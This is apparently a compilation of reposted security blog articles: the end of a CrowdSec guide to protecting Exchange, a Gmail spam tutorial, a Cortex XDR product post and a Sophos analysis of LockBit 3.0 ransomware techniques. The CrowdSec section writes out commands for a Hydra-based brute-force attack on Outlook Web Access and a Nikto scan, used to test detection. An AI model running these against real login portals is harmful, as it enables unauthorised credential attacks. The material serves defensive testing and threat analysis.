There are several possible methods to perform a brute force attack on OWA. Of course, you could do this manually for testing, but you could also use something a bit more automated to simulate a brute-force attack. As for us, we will use a Bash script named “OWA BRUTE” that executes Hydra (an offensive tool compatible with many protocols to test a service’s authentication, equipment, etc. ) with specific parameters corresponding to Outlook Web Access.

The script is available on GitHub.

First, we need to install Hydra and Git. The first one is a prerequisite to use the script and perform our attack, while the second one will be used to clone the GitHub repository to get the Bash script (you can also copy and paste the script in a file…).

sudo apt-get update

sudo apt-get install hydra git

Once this is done, we clone the GitHub project in “/home/florian”:

cd /home/florian/

git clone

Then, we create a file “users.txt” in which we indicate some names of users. You can also recover a list on the Internet.

nano /home/florian/owabrute/users.txt

In the same sense, we create a file “passwords.txt” with the passwords to test.

nano /home/florian/owabrute/passwords.txt

Then, we move to the OWA BRUTE directory to add the execution rights on the Bash script.

cd /home/florian/owabrute/

chmod +x owabrute.sh

All that remains is to launch the attack by targeting “mail.domaine.fr” and then using our previously created files.

./owabrute.sh -d mail.domaine.fr -u ./users.txt -p ./passwords.txt

We can see that the script will test each combination. At the end, it will indicate if it has succeeded or not in finding a valid combination. However, CrowdSec will intervene…

We can see that the script will test each combination, in turn.  In the end, it will indicate whether or not it succeeded in finding a valid combination.  However, CrowdSec will intervene....

Indeed, if I look at my Exchange server, I can see that there is a new IP address blocked because of brute force (“crowdsecurity/windows-bf”). The CrowdSec agent has correctly blocked the IP address that caused this attack.

.

Since we are here to test, we can unblock our IP address manually:

cscli decisions delete –ip X.X.X.X

Let’s move on to a second test.

B. Scan Web on OWA

In the case where someone tries to scan your Web server, when IIS is used by Exchange, they can rely on various tools including Nikto which is used to analyze the security level of a Web server. For this example, OWA will be scanned with the Nikto tool: we will see if CrowdSec detects what is happening on the IIS server…

First of all, let’s install this tool:

sudo apt-get update

sudo apt-get install nikto

Then, we launch the scan to webmail:

nikto -h https://mail.domaine.fr/owa

The analysis will take several minutes…

The analysis will take several minutes...

…Except that after a while, CrowdSec will realize that this web client is performing suspicious actions and it will decide to block it. In the example below, we can see the reason “http-sensitive-files” which means that the client tried to access sensitive files.

In this second example, where we performed a completely different action compared to the first attempt, CrowdSec also managed to detect our malicious actions.

IV. Conclusion

We have just seen how to set up the CrowdSec agent on Windows to protect a Microsoft Exchange mail server! Here, I took the example of Exchange Server 2019, but it also applies to previous versions. With these two quick, but concrete examples, we could see the efficiency of CrowdSec!

I’ll also take this moment to remind you of the existence of the CrowdSec Console which allows you to follow the alerts raised by one or more CrowdSec Agents from a web-based console. To learn more about the implementation and all the functionalities, you can visit the Console page.

WRITTEN BY

Florian Burnel

Source :
https://www.crowdsec.net/blog/how-to-protect-microsoft-exchange-server-crowdsec

How to keep your Gmail Inbox free of Spam and Promotions

Gmail Spam Featured Image

Using its time-tested and refined algorithms, Gmail does a pretty good job of trying to keep our inboxes free of Spam, Junk emails, and unwanted promotions. It even utilizes inbox tabs to categorize your promotions, social, updates, and forum emails and keep them out of your primary email tab where your actual new emails are shown. However, even with all of these tools, filtering out unwanted emails is not 100% perfect, and a little manual input from us can go a long way. There are three ways that you can train Gmail to filter out unwanted emails from your inbox, which are as follows:

Inbox Categories

The first is the aforementioned inbox categories that can separate certain types of emails and display them on a different tab. Although initially done programmatically, this can be further tweaked so that you have the desired results.

To turn this feature on, navigate to your Gmail settings, then click on the Inbox tabMake sure the Inbox type is set to “Default,” then add a checkmark to the categories you wish to have in a separate tab. If you just want to keep out marketing emails, add a check to the “Promotions” category, then “Save Changes.”

You will now have a “Promotions” tab in your emails that you have the option to check if desired. If you see emails in there that you’d rather go straight to your Primary tab, just drag it out and into the main tab. Gmail will then ask if you would like for it to automatically do the same for future emails from the same sender.

I just want the steps!

  1. Go to Gmail settings
  2. Click on the Inbox tab
  3. Make sure the Inbox type is set to “Default”
  4. Add a check to the “Promotions” category
  5. Click on “Save Changes”

Gmail Filters

Utilizing Gmail filters is a manual process at first, but completely pays off once it’s set up and starts automatically filtering based on the parameters you have set. You can be very deliberate with your email filters, setting specific email addresses and/or domains to automatically go to Spam, or you can be more general and block out an entire email list that you may have been unwillingly made a part of. To do this, open the Spam email you would like to filter out in the future, then click on the three-dot menu, and select “Filter messages like these.”

Depending on the email, if Gmail detects that this was sent to a mailing list and not you directly, you will see an option to filter the email based on the list itself. Click on “Create filter,” and then choose to either archive or delete the email. If there are other emails in your inbox that match this filter, you should also see an option to apply it to all the matching conversations. Once you’ve chosen your desired action(s), click on “Create filter.”

I just want the steps!

  1. Open the Spam email you would like to filter out in the future
  2. Click on the three-dot menu
  3. Select “Filter messages like these”
  4. Click on “Create filter,” and then choose to either archive or delete the email
  5. Select option to apply it to all the matching conversations
  6. Click on “Create filter”

Reporting Spam in Inbox

Lastly, you can train Gmail to programmatically unsubscribe from an email list, mark the email as Spam, or do both at the same time. The latter is the most effective and recommended method, as it not only tries to unsubscribe you from the list but also marks it as Spam in case unsubscribing doesn’t go through as it should.

To just unsubscribe, you can click on the “Unsubscribe” link that appears beside the sender’s email address. Once you click there, you will receive a notification asking you to confirm that you want to go ahead and unsubscribe.

To both unsubscribe and mark the email as Spam, click on the exclamation mark that appears in the menu above the email, then confirm that you want to form “Report spam and unsubscribe.”

I just want the steps!

  1. To just unsubscribe, click on the “Unsubscribe” link that appears beside the sender’s email address, then confirm by clicking the blue “Unsubscribe” button
  2. To both unsubscribe and mark the email as Spam, click on the exclamation mark that appears in the menu above the email
  3. At the confirmation popup, click on “Report spam and unsubscribe”

Source :
https://chromeunboxed.com/how-to-filter-spam-promotions

Protect Your iOS Devices with Cortex XDR Mobile

Cortex XDR 3.5 and Cortex XDR Agent 7.9 Deliver Stronger Security, Better Search and Broader Coverage, Including iOS Support

Your employees probably expect to work from anywhere, at any time they want, on any device. With the rise of remote work, users are accessing business apps and data from mobile devices more than ever before. Cortex XDR Mobile for iOS lets you protect your users from mobile threats, such as malicious URLs in text messages and malicious or unwanted spam calls.

Cortex XDR Mobile for iOS is just one of over 40 new features in our Cortex XDR 3.5 and Cortex XDR Agent 7.9 releases. In addition to iOS protection, we’ve bolstered endpoint security, improved the flexibility of XQL Search, and expanded visibility and normalization to additional data sources. Even more new advancements make it easier than ever to manage alert exceptions and granularly control access to alerts and incidents.

Let’s dive in and take a deeper look at the new capabilities of Cortex XDR 3.5 and Cortex XDR Agent 7.9.

iOS Protection with Cortex XDR Mobile

With the rapid shift to remote work, flexible BYOD policies are a must have, now, for many companies. Whether employees are working at home, from a café, or in a corporate office, they often have a phone within reach, and for good reason. 62% of U.S. workers say mobile phones or tablets help them be productive at work, according to a broad 2021 survey.

Phishing and Smishing and Spam, Oh My!

If you own a smartphone (like 85% of Americans do) you’ve probably received suspicious text messages claiming your bank or Amazon or PayPal account has been blocked. Or you’ve received messages saying that you need to click a link to complete a USPS shipment. And if you are receiving these messages, you can assume your users are also receiving similar messages. It’s only a matter of time before a user clicks one of these links and supplies their credentials, possibly even the same credentials they use at work. These smishing attacks, or phishing performed through SMS, are on the rise.If your organization is like many others, you’ve probably deployed an email security solution that filters spam and phishing URLs. However, you may not be protecting your mobile devices – BYOD or corporate-owned – from spam calls and phishing attacks.Screenshot of being protected by Cortex XDR, showing security events.

With Cortex XDR Mobile for iOS, you can now secure iOS devices from advanced threats like smishing. The Cortex XDR agent blocks malicious URLs in SMS messages with URL filtering powered by Unit 42 threat intelligence. It can also block spam calls, safeguarding your users from unwanted and potentially fraudulent calls. Users can also report a spam call or message, allowing the Cortex XDR administrator to block the phone number.

Hunting Down Jailbroken Devices

Some of your iPhone users might “jailbreak” their phones to remove software restrictions imposed by Apple. Once they gain root access to their phones, they can install software not available in the App Store. Jailbreaking increases the risk of downloading malware. It can also create stability issues.

The Cortex XDR agent detects jailbroken devices, including evasion techniques designed to thwart security tools. Overall, the Cortex XDR provides strong protection for iPhones and iPads, while balancing privacy and usability requirements.

Now you can protect a broad set of endpoints, mobile devices and cloud workloads in your organization, including Windows, Linux, Mac, Android, Chrome and now iOS, with the Cortex XDR agent.

In-Process Shellcode Protection

Threat actors can attempt to bypass endpoint security controls using shellcode to load malicious code into memory. Cortex XDR’s patent-pending in-process shellcode protection module blocks these attempts. To understand how, let’s look at a common attack sequence.

After threat actors have gained initial access to a host, they typically perform a series of steps, including analyzing the host operating system and delivering a malicious payload to the host.

They may use a stager to deliver the payload directly into memory rather than installing malware on the host machine. By loading the payload directly into memory, they can circumvent many antivirus solutions that will either ignore or perform more limited security checks on memory.

Many red team tools or hacking tools, such as Cobalt Strike, Sliver or Brute Ratel, have made it easier for attackers to perform these sophisticated steps.

If a process, including a benign process, executes and allocates memory in a suspicious way, the Cortex XDR agent will single out that memory allocation and extract and analyze the buffer. If the Cortex XDR agent detects any signature or indicator that the payload is malicious, the agent conducts additional analysis on the process and shellcode, including analyzing the behavior of the code and the process, using EDR data enrichment.

If the Cortex XDR agent determines the shellcode or the process loaded by the shellcode are malicious, it will terminate the process that loaded the shellcode and the allocated memory. By killing the process chain, or the “causality,” Cortex XDR prevents the malicious software from executing.

In-process shellcode protection is a patent-pending technology that helps detect and prevent the use of hacking tools and malware.

Our in-process shellcode protection will block red team and hacking tools from loading malicious code, without needing to individually identify and block each tool.

This means that if a never-before-seen hacking tool is released, Cortex XDR can prevent the tool from using shellcode to load a payload into memory.

Cortex XDR will terminate the implant once it’s loaded on the machine before it can do anything malicious.

Financial Malware and Cryptomining Protection

Whether stealing from bank accounts or mining for cryptocurrency, cybercriminals always have new tricks up their collective sleeves. To combat these dangerous threats, we’ve added two new behavior-based protection modules in Cortex XDR Agent 7.9. Let’s take a brief look at these threats and how you can mitigate them with Cortex XDR.

Banking Trojans emerged over a decade ago, typically stealing banking credentials by manipulating web browser sessions and logging keystrokes. Criminals deployed large networks of Trojans, such as Zeus, Trickbot, Emotet and Dridex, over the years. They infected millions of computers, accessed bank accounts, and transferred funds from victims. Now, threat actors often use these Trojans to deliver other types of malware to victims’ devices, like ransomware.

Cryptojacking, or malicious and unauthorized mining for cryptocurrency, is an easy way for threat actors to make money. Threat actors often target cloud services to mine cryptocurrency because cloud services provide greater scale, allowing them to mine cryptocurrency faster than a traditional endpoint. According to Unit 42 research, 23% of organizations with cloud assets are affected by cryptojacking, and it’s still the most common attack on unsecured Kubernetes clusters.

The new banking malware threat protection and cryptominers protection modules in the Cortex XDR agent automatically detect and stop the behaviors associated with these attacks. For example, to block banking malware, the module will block attempts to infect web browsers during process creation, as well as block other browser injection techniques. The cryptominers protection module will detect unusual cryptographic API or GPU access and other telltale signs of cryptojacking.

Both of these modules augment existing banking and cryptomining protection already available with Cortex XDR. You can enable, disable or set these modules to alert-only mode on Windows, Linux and macOS endpoints. You can also create exceptions per module or module rule for granular policy control.

Scope-Based Access Control for Alerts and Incidents

To address data privacy and security requirements, you might wish to control which Cortex XDR alerts and incidents your users can view. With Cortex XDR 3.5, you can control which alerts and incidents users can access based on endpoint and endpoint group tags.

Screenshot showing the update user page.

You can tag endpoints or endpoint groups by geographic location, organization, business unit, department or any other segmentation of your choice. Then, you can flexibly manage access to alerts and incidents based on the tags you’ve defined.

Alert Management Made Simple

Cortex XDR 3.5 provides several enhancements to ease alert management and reduce noise. First, you can now view and configure alert exclusions and agent exception policies from a central location. You are able to configure which alerts to suppress. You can also configure exceptions to IOC and BIOC rules to prevent matching events from triggering alerts.

A new Disable Prevention Rules feature enables you to granularly exclude prevention actions triggered by specific security modules. The Legacy Exceptions window shows legacy “allow list rules,” which are still available.

Screenshot of Cortex XDR page on IOC/BIOC suppression rules. XQL Search Integration with Vulnerability Assessment

To help you quickly hunt down threats and discover high risk assets, we have enhanced our XQL search capability. Now you can uncover vulnerable endpoints and gain valuable exposure context for investigations by viewing Common Vulnerabilities and Exposures (CVEs), as well as installed applications per endpoint. You can also list all CVEs detected in your organization, together with the endpoints and applications impacted by each CVE.

In addition, XQL search supports several new options that offer greater flexibility and control to streamline investigation and response. Notably, a new top stage command reveals the top values for a specific field quickly, with minimal memory usage. By default the top stage command displays the top ten results.

For a complete list of new features, see the Cortex XDR 3.5 and Cortex XDR Agent 7.9 release notes. To learn more about the in-process shellcode protection feature, attend the session “Today’s Top Endpoint Threats, and Advancements to Stop Them” on Tuesday, December 13, at 10:30 AM PST at the Ignite ’22 Conference.

Source :
https://www.paloaltonetworks.com/blog/2022/12/ios-devices-with-cortex-xdr-mobile/

LockBit 3.0 ‘Black’ attacks and leaks reveal wormable capabilities and tooling

Reverse-engineering reveals close similarities to BlackMatter ransomware, with some improvements

A postmortem analysis of multiple incidents in which attackers eventually launched the latest version of LockBit ransomware (known variously as LockBit 3.0 or ‘LockBit Black’), revealed the tooling used by at least one affiliate. Sophos’ Managed Detection and Response (MDR) team has observed both ransomware affiliates and legitimate penetration testers use the same collection of tooling over the past 3 months.

Leaked data about LockBit that showed the backend controls for the ransomware also seems to indicate that the creators have begun experimenting with the use of scripting that would allow the malware to “self-spread” using Windows Group Policy Objects (GPO) or the tool PSExec, potentially making it easier for the malware to laterally move and infect computers without the need for affiliates to know how to take advantage of these features for themselves, potentially speeding up the time it takes them to deploy the ransomware and encrypt targets.

A reverse-engineering analysis of the LockBit functionality shows that the ransomware has carried over most of its functionality from LockBit 2.0 and adopted new behaviors that make it more difficult to analyze by researchers. For instance, in some cases it now requires the affiliate to use a 32-character ‘password’ in the command line of the ransomware binary when launched, or else it won’t run, though not all the samples we looked at required the password.

We also observed that the ransomware runs with LocalServiceNetworkRestricted permissions, so it does not need full Administrator-level access to do its damage (supporting observations of the malware made by other researchers).

Most notably, we’ve observed (along with other researchers) that many LockBit 3.0 features and subroutines appear to have been lifted directly from BlackMatter ransomware.

Is LockBit 3.0 just ‘improved’ BlackMatter?

Other researchers previously noted that LockBit 3.0 appears to have adopted (or heavily borrowed) several concepts and techniques from the BlackMatter ransomware family.

We dug into this ourselves, and found a number of similarities which strongly suggest that LockBit 3.0 reuses code from BlackMatter.

Anti-debugging trick

Blackmatter and Lockbit 3.0 use a specific trick to conceal their internal functions calls from researchers. In both cases, the ransomware loads/resolves a Windows DLL from its hash tables, which are based on ROT13.

It will try to get pointers from the functions it needs by searching the PEB (Process Environment Block) of the module. It will then look for a specific binary data marker in the code (0xABABABAB) at the end of the heap; if it finds this marker, it means someone is debugging the code, and it doesn’t save the pointer, so the ransomware quits.

After these checks, it will create a special stub for each API it requires. There are five different types of stubs that can be created (randomly). Each stub is a small piece of shellcode that performs API hash resolution on the fly and jumps to the API address in memory. This adds some difficulties while reversing using a debugger.

Screenshot of disassembler code
LockBit’s 0xABABABAB marker

SophosLabs has put together a CyberChef recipe for decoding these stub shellcode snippets.

Output of a CyberChef recipe
The first stub, as an example (decoded with CyberChef)

Obfuscation of strings

Many strings in both LockBit 3.0 and BlackMatter are obfuscated, resolved during runtime by pushing the obfuscated strings on to the stack and decrypting with an XOR function. In both LockBit and BlackMatter, the code to achieve this is very similar.

Screenshot of disassembler code
BlackMatter’s string obfuscation (image credit: Chuong Dong)

Georgia Tech student Chuong Dong analyzed BlackMatter and showed this feature on his blog, with the screenshot above.

Screenshot of disassembler code
LockBit’s string obfuscation, in comparison

By comparison, LockBit 3.0 has adopted a string obfuscation method that looks and works in a very similar fashion to BlackMatter’s function.

API resolution

LockBit uses exactly the same implementation as BlackMatter to resolve API calls, with one exception: LockBit adds an extra step in an attempt to conceal the function from debuggers.

Screenshot of disassembler code
BlackMatter’s dynamic API resolution (image credit: Chuong Dong)

The array of calls performs precisely the same function in LockBit 3.0.

Screenshot of disassembler code
LockBit’s dynamic API resolution

Hiding threads

Both LockBit and BlackMatter hide threads using the NtSetInformationThread function, with the parameter ThreadHideFromDebugger. As you probably can guess, this means that the debugger doesn’t receive events related to this thread.

Screenshot of disassembler code
LockBit employs the same ThreadHideFromDebugger feature as an evasion technique

Printing

LockBit, like BlackMatter, sends ransom notes to available printers.

Screenshot of disassembler code
LockBit can send its ransom notes directly to printers, as BlackMatter can do

Deletion of shadow copies

Both ransomware will sabotage the infected computer’s ability to recover from file encryption by deleting the Volume Shadow Copy files.

LockBit calls the IWbemLocator::ConnectServer method to connect with the local ROOT\CIMV2 namespace and obtain the pointer to an IWbemServices object that eventually calls IWbemServices::ExecQuery to execute the WQL query.

Screenshot of disassembler code
BlackMatter code for deleting shadow copies (image credit: Chuong Dong)

LockBit’s method of doing this is identical to BlackMatter’s implementation, except that it adds a bit of string obfuscation to the subroutine.

Screenshot of disassembler code
LockBit’s deletion of shadow copies

Enumerating DNS hostnames

Both LockBit and BlackMatter enumerate hostnames on the network by calling NetShareEnum.

Screenshot of disassembler code
BlackMatter calls NetShareEnum() to enumerate hostnames… (image credit: Chuong Dong)

In the source code for LockBit, the function looks like it has been copied, verbatim, from BlackMatter.

Screenshot of disassembler code
…as does LockBit

Determining the operating system version

Both ransomware strains use identical code to check the OS version – even using the same return codes (although this is a natural choice, since the return codes are hexadecimal representations of the version number).

Screenshot of disassembler code
BlackMatter’s code for checking the OS version (image credit: Chuong Dong)
Screenshot of disassembler code
LockBit’s OS enumeration routine

Configuration

Both ransomware contain embedded configuration data inside their binary executables. We noted that LockBit decodes its config in a similar way to BlackMatter, albeit with some small differences.

For instance, BlackMatter saves its configuration in the .rsrc section, whereas LockBit stores it in .pdata

Screenshot of disassembler code
BlackMatter’s config decryption routine (image credit: Chuong Dong)

And LockBit uses a different linear congruential generator (LCG) algorithm for decoding.

Screenshot of disassembler code
LockBit’s config decryption routine

Some researchers have speculated that the close relationship between the LockBit and BlackMatter code indicates that one or more of BlackMatter’s coders were recruited by LockBit; that LockBit bought the BlackMatter codebase; or a collaboration between developers. As we noted in our white paper on multiple attackers earlier this year, it’s not uncommon for ransomware groups to interact, either inadvertently or deliberately.

Either way, these findings are further evidence that the ransomware ecosystem is complex, and fluid. Groups reuse, borrow, or steal each other’s ideas, code, and tactics as it suits them. And, as the LockBit 3.0 leak site (containing, among other things, a bug bounty and a reward for “brilliant ideas”) suggests, that gang in particular is not averse to paying for innovation.

LockBit tooling mimics what legitimate pentesters would use

Another aspect of the way LockBit 3.0’s affiliates are deploying the ransomware shows that they’re becoming very difficult to distinguish from the work of a legitimate penetration tester – aside from the fact that legitimate penetration testers, of course, have been contracted by the targeted company beforehand, and are legally allowed to perform the pentest.

The tooling we observed the attackers using included a package from GitHub called Backstab. The primary function of Backstab is, as the name implies, to sabotage the tooling that analysts in security operations centers use to monitor for suspicious activity in real time. The utility uses Microsoft’s own Process Explorer driver (signed by Microsoft) to terminate protected anti-malware processes and disable EDR utilities. Both Sophos and other researchers have observed LockBit attackers using Cobalt Strike, which has become a nearly ubiquitous attack tool among ransomware threat actors, and directly manipulating Windows Defender to evade detection.

Further complicating the parentage of LockBit 3.0 is the fact that we also encountered attackers using a password-locked variant of the ransomware, called lbb_pass.exe , which has also been used by attackers that deploy REvil ransomware. This may suggest that there are threat actors affiliated with both groups, or that threat actors not affiliated with LockBit have taken advantage of the leaked LockBit 3.0 builder. At least one group, BlooDy, has reportedly used the builder, and if history is anything to go by, more may follow suit.

LockBit 3.0 attackers also used a number of publicly-available tools and utilities that are now commonplace among ransomware threat actors, including the anti-hooking utility GMER, a tool called AV Remover published by antimalware company ESET, and a number of PowerShell scripts designed to remove Sophos products from computers where Tamper Protection has either never been enabled, or has been disabled by the attackers after they obtained the credentials to the organization’s management console.

We also saw evidence the attackers used a tool called Netscan to probe the target’s network, and of course, the ubiquitous password-sniffer Mimikatz.

Incident response makes no distinction

Because these utilities are in widespread use, MDR and Rapid Response treats them all equally – as though an attack is underway – and immediately alerts the targets when they’re detected.

We found the attackers took advantage of less-than-ideal security measures in place on the targeted networks. As we mentioned in our Active Adversaries Report on multiple ransomware attackers, the lack of multifactor authentication (MFA) on critical internal logins (such as management consoles) permits an intruder to use tooling that can sniff or keystroke-capture administrators’ passwords and then gain access to that management console.

It’s safe to assume that experienced threat actors are at least as familiar with Sophos Central and other console tools as the legitimate users of those consoles, and they know exactly where to go to weaken or disable the endpoint protection software. In fact, in at least one incident involving a LockBit threat actor, we observed them downloading files which, from their names, appeared to be intended to remove Sophos protection: sophoscentralremoval-master.zip and sophos-removal-tool-master.zip. So protecting those admin logins is among the most critically important steps admins can take to defend their networks.

For a list of IOCs associated with LockBit 3.0, please see our GitHub.

Acknowledgments

Sophos X-Ops acknowledges the collaboration of Colin Cowie, Gabor Szappanos, Alex Vermaning, and Steeve Gaudreault in producing this report.

Source :
https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/